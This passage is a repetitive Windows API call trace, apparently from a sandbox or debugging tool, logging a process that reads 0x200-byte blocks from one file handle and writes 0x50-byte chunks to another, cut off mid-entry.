[0205.896] GetFileType (hFile=0x50) returned 0x1 [0205.896] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.896] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.897] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.897] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.898] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.898] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] GetFileType (hFile=0x50) returned 0x1 [0205.898] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.898] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.899] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.899] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] GetFileType (hFile=0x50) returned 0x1 [0205.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.899] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.900] GetFileType (hFile=0x50) returned 0x1 [0205.900] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.901] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.901] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] GetFileType (hFile=0x50) returned 0x1 [0205.901] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.901] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.902] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.902] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.902] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.902] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] GetFileType (hFile=0x50) returned 0x1 [0205.903] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.903] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.904] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.904] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] GetFileType (hFile=0x50) returned 0x1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.904] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.904] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.905] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.905] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] GetFileType (hFile=0x50) returned 0x1 [0205.905] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.905] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.906] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.906] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.907] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.907] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] GetFileType (hFile=0x50) returned 0x1 [0205.907] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.907] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: 